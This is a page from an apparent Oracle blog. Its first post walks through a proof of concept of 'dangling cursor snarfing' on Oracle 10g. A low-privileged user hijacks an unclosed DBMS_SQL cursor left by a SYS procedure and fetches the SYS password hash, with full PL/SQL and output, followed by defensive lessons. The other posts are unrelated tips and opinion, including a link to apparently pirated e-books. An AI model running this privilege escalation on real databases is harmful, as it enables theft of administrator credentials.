News, views, tips and tricks on Oracle and other fun stuff

See How To Hack Oracle Using Dangling Cursor Snarfing

David Litchfield published a paper showing how a cursor that DBMS_SQL opens inside a definer's rights procedure and never closes (an unclosed, or dangling, cursor) can be picked up by the caller and re-executed with the procedure owner's privileges.

I ran his proof of this vulnerability on my Oracle Database 10g Express Edition database.

Connected as SYS:

SQL> CREATE OR REPLACE PROCEDURE pwd_compare(p_user VARCHAR) IS
  2    cursor_name INTEGER;
  3    v_pwd VARCHAR2(30);
  4    i INTEGER;
  5  BEGIN
  6
  7    IF p_user != 'SYS' THEN
  8      cursor_name := dbms_sql.open_cursor;
  9      DBMS_OUTPUT.PUT_LINE('CURSOR: ' || cursor_name);
 10      dbms_sql.parse(cursor_name,
 11        'SELECT PASSWORD FROM SYS.DBA_USERS WHERE USERNAME = :u',
 12        dbms_sql.native);
 13      dbms_sql.bind_variable(cursor_name,   ':u',   p_user);
 14      dbms_sql.define_column(cursor_name,   1,   v_pwd,   30);
 15      i := dbms_sql.EXECUTE(cursor_name);
 16
 17      IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
 18        dbms_sql.column_value(cursor_name,   1,   v_pwd);
 19      END IF;
 20
 21      IF v_pwd = '0123456789ABCDEF' THEN
 22        DBMS_OUTPUT.PUT_LINE('Hmmm....');
 23      END IF;
 24
 25      dbms_sql.close_cursor(cursor_name);
 26    END IF;
 27
 28  END;
 29  /

Procedure created.

SQL> GRANT EXECUTE ON pwd_compare TO PUBLIC;

Grant succeeded.

Note that the code above has no exception handler, so if anything fails after open_cursor and before close_cursor the cursor is left open (dangling) in the session. Because pwd_compare is a definer's rights procedure owned by SYS and executable by PUBLIC, that cursor was parsed with SYS's privileges against SYS.DBA_USERS.

Now, let's connect as HR, a less privileged user than SYS, and execute the procedure pwd_compare, making sure we trigger an exception inside it (the bind value is far longer than any username, so the error fires at the EXECUTE call on line 15, after the cursor has been opened):

SQL> DECLARE x VARCHAR(32000);
  2  i INTEGER;
  3  BEGIN
  4    FOR i IN 1 .. 10000
  5    LOOP
  6      x := 'B' || x;
  7    END LOOP;
  8
  9    sys.pwd_compare(x);
 10  END;
 11  /
CURSOR: 6
DECLARE x VARCHAR(32000);
*
ERROR at line 1:
ORA-01460: unimplemented or unreasonable conversion requested
ORA-06512: at "SYS.DBMS_SYS_SQL", line 1202
ORA-06512: at "SYS.DBMS_SQL", line 323
ORA-06512: at "SYS.PWD_COMPARE", line 15
ORA-06512: at line 9

What we have now is a dangling cursor with an ID number of 6 (we know the number only because the procedure prints it; as the 6 shows, cursor numbers on this release are small integers). A DBMS_SQL cursor belongs to the session, not to the procedure that opened it, and this one was parsed while running as SYS. So HR can hand the number straight back to DBMS_SQL: rebind :u to SYS, re-execute, and fetch the SYS password hash, bypassing the IF p_user != 'SYS' check in pwd_compare entirely:

SQL> DECLARE cursor_name INTEGER;
  2  i INTEGER;
  3  pwd VARCHAR2(30);
  4  BEGIN
  5    cursor_name := 6;
  6    dbms_sql.bind_variable(cursor_name,   ':u',   'SYS');
  7    dbms_sql.define_column(cursor_name,   1,   pwd,   30);
  8    i := dbms_sql.EXECUTE(cursor_name);
  9
 10    IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
 11      dbms_sql.column_value(cursor_name,   1,   pwd);
 12    END IF;
 13
 14    dbms_sql.close_cursor(cursor_name);
 15    DBMS_OUTPUT.PUT_LINE('PWD: ' || pwd);
 16  END;
 17  /
PWD: 586EEA79959C07B1

PL/SQL procedure successfully completed.

Interesting!

Lessons learned:

  1. Always validate input before using it. A username longer than the column allows should be rejected up front, not left to blow up inside DBMS_SQL.
  2. Always add an exception handler to any block that opens a DBMS_SQL cursor, and have it close the cursor (check dbms_sql.is_open first) before re-raising.
  3. Always close your cursors, on the error path as well as the normal one. Whatever is left open can be rebound and re-executed by the caller with the privileges it was parsed under.

Later releases (Oracle Database 11g onwards) added checks to DBMS_SQL that reject a cursor number used under a different effective user or role set than the one it was parsed with (ORA-29470) and disable DBMS_SQL for the session when an invalid cursor number is passed (ORA-29471). On 10g, as shown above, the only protection is the code itself.

Sources and resources:

1 Comment | Filed in Oracle, Security, Tips


Do You Have These Symptoms?

One of my ex-coworkers emailed me this photo. The subject of the email was: Winner of “not my job” award.

When I looked at this photo, the word “laziness” started flashing in my mind. My thoughts then wandered to laziness as it related to programming. I then asked myself: what is laziness in programming? Here are a few thoughts:

  • Laziness is when you do not follow best practices.
  • Laziness is when you do not handle exceptions.
  • Laziness is when you do not research problems before asking dumb questions.
  • Laziness is when you do not check out what’s new in new versions.
  • Laziness is when you do not take the time to learn every feature available to you.
  • Laziness is when you do not comment or document your code.
  • Laziness is when you do it the quick and dirty way.
  • Laziness is when you start coding before even understanding what the program really does.
  • Laziness is WHEN OTHERS THEN NULL.

Throughout my career I was guilty of being lazy. But some may argue that good programmers are not only lazy, but also dumb:

…for a lazy programmer to be a good programmer, he (or she) also must be incredibly unlazy when it comes to learning how to stay lazy – that is, which software tools make his work easier, which approaches avoid redundancy, and how he can make his work be maintained and refactored easily.

…a good programmer must be dumb. Why? Because if he’s smart, and he knows he is smart, he will: a) stop learning b) stop being critical towards his own work… a good programmer, when confronted with a problem from management, will adopt this mindset of being dumb; he will start asking the most simple, child-like questions. Because he doesn’t accept the parameters suggested to him that someone thinks make up the problem.

So, you should always try to be lazy in an “unlazy” way, and dumb in a smart way.

12 Comments | Filed in ColdFusion, Interesting Stuff, Oracle


Four New Blogs Added to OraNA

Just a quick note to let you know that I have added the following blogs to OraNA:

Have a great weekend!

2 Comments | Filed in Oracle


See How Easily You Can Search Oracle

Since the introduction of the first Oracle search plugins for Firefox, a few things have changed:

So, what does this have to do with search plugins? Read on and you will know:

  • What’s new in IE7 and Firefox 2 regarding search plugins.
  • You will be introduced to the new Oracle custom search engines powered by Google.
  • And you will be able to install many Oracle search plugins that will help you in your Oracle-related research and learning.

Search plugins in the new Firefox 2 and IE 7

Both Firefox 2 and IE 7 now support the OpenSearch description format (an XML file) for search plugins, which means that a search plugin developed for Firefox can be installed and used, unchanged, in Internet Explorer.

Moreover, there are now two (automated) ways to install search plugins (and they both work in Firefox 2 and IE 7). The first is to call one simple JavaScript function, the second is through auto-discovery of search plugins.

Using auto-discovery, a web site that offers a search plugin can advertise it so that Firefox 2 and IE 7 users can easily download and install the plugin. This is similar to the RSS auto-discovery of feeds.

Search Plugin Installation in IE 7 Using Auto-Discovery

In IE 7, here is how the search bar looks when you browse a website without search plugin auto-discovery:

iesb.png

And here is how it looks with search plugin auto-discovery enabled:

iesb-ad.png

If you click on that small orange down-arrow, you will see something similar to this:

iesb-ad2.png

In fact, if you are using IE 7 to browse this very page, you will be able to see it in action in your browser right now. Just look at your search bar.

Note: I have noticed that IE 7 does not discover more than 3 search plugins using auto-discovery.

Search Plugin Installation in IE 7 Using a JavaScript Link

Alternatively, if the installation is done using the JavaScript link, you will be presented with this window in IE 7:

iesb-ad3.png

Search Plugin Installation in Firefox 2 Using Auto-Discovery

In Firefox 2, here is how the search bar looks when you browse a website without search plugin auto-discovery:

ffsb.png

And here is how it looks with search plugin auto-discovery enabled:

ffsb-ad.png

If you click on that small blue-ish down-arrow, you will see something similar to this:

ffsb-ad2.png

In fact, if you are using Firefox 2.0 to browse this very page (or Wikipedia for example), you will be able to see it in action in your browser. Just look at your search bar.

Search Plugin Installation in Firefox 2 Using a JavaScript Link

Alternatively, if the installation is done using the JavaScript link, you will be presented with this window in Firefox 2.0:

ffsb-ad3.png

Oracle Custom Search Engines

I have created three Oracle custom search engines powered by Google.

  1. The first search engine is for Oracle-related blogs. It searches all the blogs aggregated by OraNA.

  2. The second search engine is for Oracle-related forums and mailing lists. Currently this search engine searches the following sites:

    Let me know if you have other Oracle-related forums you want to include in this search engine.

  3. The third search engine is for Oracle-related websites. Currently this search engine searches the following sites:

    Let me know if you have other Oracle-related sites you want to include in this search engine.

These search engines, and more, are now available to you right from your browser’s search bar.

Install Oracle search plugins

Just click on a search plugin below to add it to the list of engines available in your browser’s search bar:
(Firefox 2 or IE 7 and above only)

Oracle Custom Search Engines:

Oracle Documentation Search Engines:

Keyboard Shortcuts

Here are four search bar keyboard shortcuts that will make using the search bar even faster:

  • Go to search bar: Ctrl+K in Firefox. Ctrl+E in IE.
  • Select next search engine in search bar: Alt+Down in Firefox. Ctrl+Down in IE.
  • Select previous search engine in search bar: Alt+Up in Firefox. Ctrl+Up in IE.
  • Open search results in a new tab: Alt+Enter

And here is a bonus tip to change the width of the search bar in Firefox.

Happy searching!

6 Comments | Filed in Firefox, Google, Oracle, Plugins


links for 2006-11-17

Comments Off | Filed in Links


Hundreds of Free E-Books, Wow!

I came across this Chinese website that has hundreds of e-books about Oracle, Microsoft, Dreamweaver, Flash, Java, PHP, mySQL, Linux, Cisco and many many more, all ready for your online reading pleasure. I do not think this is legal. At least, it is as legal as software piracy.

2 Comments | Filed in Books, ColdFusion, Oracle


Bart’s Punishment For Asking Dumb Questions

I will use Google before asking dumb questions

Using Google to find answers is a good idea, but when it comes to finding answers to technical questions, hitting the documentation first is a very smart move that may save you some humiliation later on.

When you ask “obvious” questions on forums or mailing lists, there is a good chance that the more experienced forum contributors will hit you with an answer like this one: RTFM before asking dumb questions.

Tim Hall has noticed a trend in the Oracle forums:

It feels like most posters these days don’t even bother to open the manuals before asking a question. I can’t count the number of times I’ve been asked a question, that is answered by the first couple of paragraphs in the manual. It’s just lazy beyond words.

OK, so Tim is predicting the downfall of Oracle forums because posters don’t bother to RTFM first.

Now, with the help of Oracle Blogs Search and Google, let’s see what other bloggers have written about this subject:

RTFM – by Tom Kyte:

I do recommend and point people to the documentation, but I don’t think I give RTFM answers… I will answer with a gentle reminder such as “well, when I typed your subject into the search field, I found these 5 articles, did you see them?”.

How To Be A Good Guru – by Andrew Clarke:

Telling some newbie “RTFM” is an act of pure arrogance. It just feeds the respondent’s ego without helping that questioner learn anything, except maybe not to ask for help in the forum again.

But it’s in the manual! – by Jonathan Lewis:

I’ve just seen a note on the news group comp.databases.server.oracle advising someone to check the online manual for a piece of code to report which objects are using how much space in the buffer cache. This is the reference and this is the code… There are two flaws with this code – it gets the wrong results, and it’s inefficient.

RTFM, Newbies etc – by Niall Litchfield:

RTFM says “you’re wasting my time and I think you are stupid”. I wouldn’t say that to anyone in one-to-one conversation, I don’t see why it is acceptable in email. (unless you are 14, male and on a video games forum obviously).

Read the ******* Manual – by Andrew Gilfrin:

First let me say I’m not a prude, but neither do I have a mouth like a toilet. But I do find the acronym RTFM incredibly offensive.

How to get users to RTFM – by Kathy Sierra

The “F” in RTFM is the biggest clue that most of us blame the user for not reading the manual… since we can’t force our users to do anything, if we want them to RTFM, we need to make a better FM.

And finally, here is what I say:

  1. Don’t use the acronym RTFM.
  2. Do point people to the documentation.
  3. Don’t blindly trust the documentation.
  4. Do test, test and test, even after you read the documentation.
  5. Don’t be afraid to ask dumb questions. What’s dumb to some, is genius to others.

Feel free to add your own DO or DON’T, or even ask dumb questions, I promise I won’t throw an RTFM on you :)

15 Comments | Filed in Oracle, Tips


A Couple of Podcasts About PL/SQL and Oracle Security

SearchOracle.com has just published a couple of interesting podcasts.

The first, titled Expert says PL/SQL change needed in Oracle 11g, is an interview with Steven Feuerstein.

In the interview, Steven answers the following questions:

  • Considering how big OpenWorld has become, should there be a separate conference for PL/SQL developers?
  • Your session at the conference was entitled “Ten things you should never do with PL/SQL.” What was number one?
  • What do you think is the biggest problem or challenge that PL/SQL developers need to address?
  • Users are very conditioned to accept bugs. Does this need to change?
  • Can you tell us about your new free tool for testing code?
  • What do you think are the biggest deficiencies in the PL/SQL language itself?
  • You’ve written ten very well regarded books. What’s next?

Listen to Steven’s answers

The second podcast, titled Security expert sizes up Oracle patch policies, is an interview with Aaron Newman, author of “Oracle Security Handbook” and co-founder and chief technology officer of Application Security Inc.

In the interview, Aaron answers the following questions:

  • Is Oracle OpenWorld getting too big to be useful?
  • Can you explain the methodology behind what you call post-attack analytics?
  • You argue that improper use of Oracle security products can erase the trail of an attacker. Could you elaborate on that?
  • What do you think about the overall state of Oracle security these days?
  • Is patching vulnerabilities a problem for Oracle?
  • How does Oracle stack up against Microsoft and IBM in the area of patching?
  • What does your firm offer in terms of security that Oracle does not?
  • Will Oracle’s Fusion initiative be good or bad for Oracle security?
  • What have you heard about the upcoming Oracle Database 11g?
  • What are some of the pet peeves you have with Oracle DBAs when it comes to security?

Listen to Aaron’s answers

5 Comments | Filed in Oracle, Security


Peek at what others are putting in their Google Notebook

Google Notebook is very useful. It enables you to clip and gather information while you're browsing the web. It lives in your browser and online. All your web findings are gathered into one organized, easily accessible location that you can reach from any computer. In fact, I use Google Notebook to store notes and ideas about things I want to blog about.

Moreover, Google Notebook has a very interesting feature. You can actually publish your notebook to the web, allowing the public to view your notebook’s content. Your public notebook is also included in Google’s search results, and, as a result, searchable. That’s cool. Let’s search the public Google notebooks for “Oracle”:

Interesting. About 447 public Google notebooks have the word "Oracle" in them. Now, if you would please excuse me, I'll go and poke around these Oracle notebooks, just out of curiosity.

Comments Off | Filed in Google, Oracle, Tips


Give Me One Minute And I’ll Tell You If You Are Liberal Or Conservative

This Tuesday is election day in the United States. It's a big day. Political enthusiasts from both the Republican and Democratic parties go to the polls and vote for their preferred candidates for Congress, state legislature and governor.

But what does this have to do with databases? Well, it turns out that the SQL language has politics embedded in it. For example, consider the following two simple queries:

Query 1:

SELECT emp.last_name,
       dept.department_name
  FROM departments dept LEFT OUTER JOIN employees emp
       ON dept.department_id = emp.department_id;

Query 2:

SELECT emp.last_name,
       dept.department_name
  FROM employees emp RIGHT OUTER JOIN departments dept
       ON dept.department_id = emp.department_id;

Both queries return the same result set. The difference between the two is that one uses “LEFT” and the other uses “RIGHT”.

Which one do you prefer using? In other words, which type of outer join do you usually use in your queries, the left or the right?

Now, if you select query 1, the one that uses the “LEFT” join, you most probably lean towards the left. You are a liberal. As a result, you are more likely to vote Democrat this Tuesday.

But, if you select query 2, the one that uses the “RIGHT” join, you most probably lean towards the right. You are a conservative. As a result, you are more likely to vote Republican this Tuesday.

There you go. A simple test, for all of you SQL developers out there, to know your political affiliation. :)

Some have called for a boycott of all right joins and only use left joins on Tuesday. Others have called for the abolition of both the left and the right.

Personally, I do not use right joins. But again, I cannot vote because I’m not a US citizen.

6 Comments | Filed in Interesting Stuff, Joins, Oracle